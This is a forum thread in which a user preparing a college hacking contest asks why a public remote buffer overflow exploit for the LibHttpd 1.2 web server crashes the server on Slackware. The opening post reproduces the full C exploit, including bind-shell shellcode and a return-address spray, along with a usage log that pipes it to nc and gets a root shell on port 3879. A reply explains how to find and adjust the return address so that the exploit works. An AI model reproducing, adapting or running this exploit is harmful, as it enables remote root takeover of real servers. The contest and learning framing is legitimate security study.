LibHttp 1.2 BO exploit Help

[PacketThirst]

Hey !

I'm trying to organise a hacking contest for my college. I've decided to use LibHttpd 1.2, a very basic web server. This version is prone to a BO.



The Following is the vulnerable part of the code

__
860 void httpdProcessRequest(server)
861 httpd *server;
862 {
863 char dirName[HTTP_MAX_URL],
...
869 server->response.responseLength = 0;
870 strcpy(dirName, httpdRequestPath(server)); // here.




So, i setup a small test server on my Slackware box. I tried the following exploit code
/*
**
** Lib HTTPd Remote Buffer Overflow exploit
** by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc_at_hotmail.com>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
int shadd2r;
char b1ndsh[] = /* 129byte bindshellcode */
"\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
"\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
"\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
"\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
"\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
"\377\377/bin/sh";
//--- POST &shellcode ---//
fprintf(stdout,"POST ");
for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
{/* rEDhAT Default: 0x804e482,
Debian Address? */
fprintf(stdout,"\202\344\004\b");
}
fprintf(stdout,"\r\n");
//--- NOP,shellcode ---//
for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
{/* SSSSSSSS...SSSSSSSSS;;; */
fprintf(stdout,"S");
}
fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}




After executing the exploit, the web server crashed and gave a segmentation fault error. It wasnt able to keep a port open.I'm not all that good at debugging. Could some one please tell me what went wrong ?.

http://www.utimaco.us/lists/bugtraq/2002/Nov/0208.html




Thanks a lot in advance

[skiddieleet]

Looks like it was written to be run against a redhat box running the server. Perhaps the return address is different on slackware and that's why it's segfaulting. Fool around with it a bit. You can probably get it to work. Good luck.

[PacketThirst]

Thanks for the reply Heretic. But, how do i find the return address for a slackware box ?. Can
it be found using GDB ?.

[skiddieleet]

I would change libhttp 1.2's code from where you pasted to print out the address of dirName.
fprintf(stderr, "0x%x\n", dirName);
Then recompile and run it. Then make a request and see the address it prints out. You will want to make that your return address. You may have to nudge it around a bit though. Actually. That will probably be way off from the return address you want. It looks like the code sends the return address, then a nop sled, then the shellcode. So the shellcode will be way ahead of the address of dirName. I'm pretty sure dirName will only contain the return address. and the return address is probably another variable which they put the shellcode. They probably store stuff in new variables based on lines in the request. so when the attacker sends \r\n, it stores what follows in a new variable I'm guessing. So you will want the address of another char[] as your return address. I'm sort of typing as I think about it, so that's why I'm contradicting myself a lot :P. Hopefully what I said helps. Good luck.

[PacketThirst]

I don't quite understand how the initial 1024 bytes of the buffer is filled with the return address. Is " fprintf(stdout,"\202\344\004\b");" the representation of 0x804e482 ?. If so, how does it go ??